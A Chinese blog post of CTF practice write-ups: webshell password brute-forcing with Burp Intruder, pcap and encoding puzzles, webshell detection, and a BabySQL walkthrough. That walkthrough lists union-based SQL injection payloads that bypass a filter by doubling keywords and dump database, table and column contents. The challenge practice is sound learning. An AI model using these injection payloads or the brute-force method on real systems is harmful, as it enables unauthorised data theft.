CTF刷题04

最新推荐文章于 2024-08-02 16:44:28 发布
最新推荐文章于 2024-08-02 16:44:28 发布
阅读量3.1k 收藏 6
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46150940/article/details/108931797
版权

网站被黑

访问题目地址
在这里插入图片描述
用御剑扫一下,发现了一个shell.php
在这里插入图片描述
访问shell.php,随便输入一个,然后用burpsuite抓包
在这里插入图片描述
右键,点击Send to Intruder
在这里插入图片描述
Payload type:选择Simple list,Add from list选择Passwords,然后点击右上方的Start attack
在这里插入图片描述
发现当payload为hack,length为1110
在这里插入图片描述
提交hack,得到flag
在这里插入图片描述

数据包中的线索

题目描述:公安机关近期截获到某网络犯罪团伙在线交流的数据包,但无法分析出具体的交流内容,聪明的你能帮公安机关找到线索吗? 注意:得到的 flag 请包上 flag{} 提交
下载附件,用wireshark打开。
在这里插入图片描述追踪http流,发现了一段密文,密文以=结尾,猜想应该是Base64
在这里插入图片描述
进行Base64解码,发现都是乱码。
在这里插入图片描述换个Base64解密网站,继续进行解密,发现是转存为了jpg文件,怪不得会乱码。
在这里插入图片描述下载图片,flag就出来了
在这里插入图片描述

后门查杀

题目描述:
小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?(Webshell中的密码(md5)即为答案)。 注意:得到的 flag 请包上 flag{} 提交

将下载的附件解压,然后使用D盾扫描,发现了两个可疑的文件。
在这里插入图片描述查看一下这两个文件,在其中一个文件中发现了flag。
在这里插入图片描述

[极客大挑战 2019]Knife

在这里插入图片描述
使用蚁剑进行操作,一句话木马中给出密码是Syc,进行添加。

在这里插入图片描述点击进入添加的地址

在这里插入图片描述查看目录,看到flag文件
在这里插入图片描述点击flag文件,得到flag。
在这里插入图片描述

[极客大挑战 2019]BabySQL

在这里插入图片描述1. 万能密码注入
尝试万能密码 1' or 1=1 #,报错语句中没有看到or,or被过滤
在这里插入图片描述尝试双写or:1' oorr 1=1 #,没有报错,应该是双写绕过
在这里插入图片描述2. 查字段
构造payload:

?username=admin&password=pwd %27 union select 1 %23

报错提示中只保留了 1# ,说明union和select都被过滤了

在这里插入图片描述双写union和select,继续注入

?username=admin&password=123456 %27 ununionion seselectlect 1 %23

注入成功,但报错语句告诉我们列数不对
在这里插入图片描述
继续构造payload:

?username=admin&password=123456 %27 ununionion seselectlect 1,2,3 %23

发现注入成功,字段为3

在这里插入图片描述3. 爆数据库

Payload:
?username=admin&password=123456%20%27 ununionion seselectlect 1,2,database() %23

获取到当前库名为geek
在这里插入图片描述
查看所有库名

Payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

看到了一个名为ctf的数据库,flag应该在这
在这里插入图片描述

  1. 查表
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables)whwhereere table_schema="ctf" %23

发现了一个名为Flag的表
在这里插入图片描述

  1. 查字段名
    构造payload:
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

在这里插入图片描述

  1. 获取数据
?username=admin&password=123456 %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

得到flag
在这里插入图片描述

base64÷4

下载附件,打开文件
在这里插入图片描述
由题目名字可知是Base16,解密可得到flag
在这里插入图片描述

告诉你个秘密

下载附件,观察一下发现是十六进制
在这里插入图片描述
16进制转化字符串
在这里插入图片描述
得到的字符串长度为48,为4的倍数,有点像base64,来进行Base64解密
在这里插入图片描述
一时不知道是什么加密,看了一下wp,才知道原来是键盘密码,突然感到脑洞不够用了
对着键盘将这些字符串转化出来,得到flag

TONGYUAN

safer-than-rot13

下载附件,得到一大串字符串
在这里插入图片描述
rot13解密,发现不了什么猫腻
在这里插入图片描述
再看一遍题目,题目意思原来是比rot13更安全
进行词频分析,得到了flag
在这里插入图片描述

神奇的Modbus

下载附件,得到一个数据包,用wireshark打开,搜索栏中输入Modbus查找。
在这里插入图片描述
鼠标右键,点击追踪流,TCP流

浏览一下发现了flag
在这里插入图片描述
提交sctf{Easy_Mdbus}发现错误,所以flag应该是sctf{Easy_Modbus}

Atkxor
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
BUUCTF-刷题记录(2020.11.11)
Georgeiweb的博客
11-12 518
Morse 题目: 得到的 flag 包上 flag{} 提交。 打开文件是: -…/.----/-…/-…/-…/…–/--…/…-/-…/-…/–…/-…/…–/.----/–…/…–/…—/–…/–…/…-/…/…-./–…/…–/…–/-----/…/…-./…–/…–/…–/…-/…–/…/–…/----./–…/-… 解题思路: 看题目可以看出是摩丝密码,然后用在线工具解密 网站是:Morse在线解密 解密出来是:61666374667B317327745F73305F333435797D 然
CTF_刷题记录
煤矿路口西的博客
08-15 721
6月21日20点-22日20点 第五名(5/9) 1200点 一个月学习密码学的成果吼吼吼 继续努力吧 REVERSE 2题 CRYPTO 4题 MISC 2题 REVERSE HelloCTF 用IDA打开 这串字符感觉似曾相识,拿去16进制转文本可得:CrackMeJustForFun, 套上falg{}提交 insanity 用IDE打开 得flag{This_is_a_flag} (这两题完全白给,搜的题目关键字。但是re完全不会,不行啊…… CRYPTO CRYPTO-warmup 文件提
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 8288
BUUCTF题目Misc部分wp(持续更新)
BUUCTF-摩丝
m0_73852491的博客
07-04 543
BUUCTF-摩丝
2024最全CTF入门指南、CTF夺旗赛及刷题网站(建议收藏!)
最新发布
2301_77160226的博客
08-02 882
CTF(Capture The Flag),中文称为夺旗赛,是网络安全领域中一种备受关注和欢迎的竞赛形式。
实验吧ctf-加了料的报错注入(HTTP响应拆分漏洞)
烟敛寒林的博客
04-25 649
解题链接: http://ctf5.shiyanbar.com/web/baocuo/index.php 根据页面提示,我们需要用post方式传入username和password。 尝试输入username=1'&password=1',报错: 也就是说,单引号没有被吃掉。 而后,在页面源代码中发现tip: 输入username='or '1&a...
BUUCTF-杂项-1
m0_46383107的博客
09-12 1979
BUUCTF 杂项 文章目录BUUCTF杂项N种方法解决wireshark被嗅探的流量easycapFLAG另外一个世界假如给我三天光明A_Beautiful_Picture神秘龙卷风来首歌吧 N种方法解决 打开后下载文件key.exe 放到010Editor.exe里面可以看到一段文本 由于前面是image/jpg 和base64加密 就直接去网上解密并弄成图片形式 网站:https://the-x.cn/base64/(注意要把前面的data:image/jpg;base64,这一段去掉才可以编译)
CTF刷题记录
qq_66633020的博客
05-11 1078
将密文进行base64解密后,发现不是flag,猜测可能进行了换表。查看函数,发现在进行base64加密前,sub_401000函数对base64表进行了修改。获取题目附件,将文件放入IDA中进行分析,找到main函数。刷题平台:BUUCTF。方向:REVERSE。
我的ctf刷题wp笔记
03-25
### CTF刷题WP笔记解析 #### 1. SWPUCTF 2021 新生赛 —— whitegive_pwnV1 本题目聚焦于一个典型的CTF比赛中的二进制漏洞利用挑战,名为“whitegive_pwnV1”。通过对题目描述的解读,我们可以深入分析其中涉及的...
【2023.5.3~2023.5.9】CTF刷题记录
qq_66633020的博客
05-03 1041
获取题目附件,根据题目名可知是由python编写,所以直接用uncompyle6进行反编译,dump出py文件。可以看出程序对输入内容进行了两个加密,这两个加密可逆并知道了密文,开始写解密脚本。题目:[GWCTF 2019]pyre。日期:2023.5.3。方向:REVERSE。
ctf学习刷题网址合集.md
05-16
ctf学习刷题网址合集.md
XJPC-CTF刷题记录
MZEPSan的博客
12-14 553
上平台刷题,交个作业 WEB部分 404喽 感觉像是签到题。。。 flag{4cewa8-ed7a-t6g5-93d8-e9fd8fer} 简单的登录 进入页面 既然说是简单的登录,那先尝试弱口令,admin、root之类的 admin成功 flag{sfasf4-456a-1f85-yy5g-3sd524fd} GET - POST ? 常规题,正常做 继续 flag{jjt58t-49rg-g...
BUUCTF--Misc前15题
qq_75120258的博客
03-02 465
这个是一个rar文件,里面好像隐藏着什么秘密,但是压缩包被加密了,毫无保留的告诉你,rar的密码是4位纯数字。打开是一张图片,使用StegSolve工具,打开Analyse(分析)选项卡,使用Data Extract(数据提取)选项,进行分析。得到一个GIF图片,猜测可能是图片隐写,使用stegsolve一帧一帧的看得到flag得到一个BASE64编码,使用在线转换成一个图片,得到一个二维码,扫一扫得到flag。打开是一张图片,还是使用stegsolve分析他的文件格式,得到flag
CTF之MISC(安全杂项)
weixin_62880319的博客
04-21 1430
总结:用base64进行解码的时候,不小心多粘了无关字符,导致没有jpg提示框,就卡在了解码这步。启示:操作一定要细心。某黑客潜入到某公司内网通过嗅探抓取了一段文件传输的数据,该数据也被该公司截获,你能帮该公司分析他抓取的到底是什么文件的数据吗?2.观察output软件是乱码,但是开头有PK(即代表zip的字样,并且有flag.txt所以其很可能是解题的关键)告诉你,其实保险箱的密码是小明的银行密码。题目分析:压缩包注释信息是真正的压缩包(但数据有损坏),尤其是下面那一串代码,应该很重要,是解题的关键。
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7445
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF-MISC-黑客帝国~喵喵喵
七堇年的博客
11-16 5176
文章目录1.黑客帝国 1.黑客帝国 题目描述:Jack很喜欢看黑客帝国电影,一天他正在上网时突然发现屏幕不受控制,出现了很多数据再滚屏,结束后留下了一份神秘的数据文件,难道这是另一个世界给Jack留下的信息?聪明的你能帮Jack破解这份数据的意义吗? 注意得到的 flag 包上 flag{} 提交 解题步骤:010打开查看,发现二进制文件头i 在这里插入代码片 txt ...
2021寒假MISC打卡DAY1
煤矿路口西的博客
01-11 582
CSDN上将按时间顺序更新,每天8道。个人博客上按类别分类。 [SUCTF2018]single dog 得到的 flag 包上 flag{} 提交。来源:https://github.com/hebtuerror404/CTF_competition_warehouse_2018 一张JPG 右键文件属性无果,查看二进制,文件末尾存在504B0102字样,全文搜索504B0304得到完整压缩包。 得到1.txt ゚ω゚ノ= /`m´)ノ ~┻━┻ //*´∇`*/ ['_']; o
爬取某学者主页上的文献
m0_38109459的博客
12-27 393
这爬取某学者主页上的文献 做研究经常与参考文献打交道,有时我们需要下载某个学者主页上的全部已发表文献,得到主页网址,点进去,一个接一个的下呗… 如果主页上的文章少,那么手动下载还可以。但有些大牛的主页上挂的文章数量动辄百十来篇,一个接一个下载太浪费感情了… 呜呼哀哉!之前大意了啊,当时没有想,现在,我爬一下就想起来了,很快啊,可以用爬虫啊! 下面我们就以”纪辉“这位学者的主页为例,说明如何爬取他主页上的文献。 文献所在的url是https://blog.nus.edu.sg/matjh/publicati
BUUCTF reverse1-10 WP
mumuzi的博客
03-28 4385
笔记是按照当时的题目排序写的,顺序可能有出入 做题是从0开始做起,所以前面部分也会尽可能写的详细一点 只要能记录并且了解到怎么做即可,所以就没有去在意排版 遇到不会的函数尽可能去百度了解 因为前面的题难度不大,所以前面的每道题都没有去查壳,除非有特殊:) 题目:easyre、reverse1、reverse2、内涵的软件、新年快乐、helloword、xor、reverse3、不一样的flag、SimpleRev 1.easyre 非常简单的逆向 拖入winhex,搜索flag即可 flag{this_I
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Atkxor

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值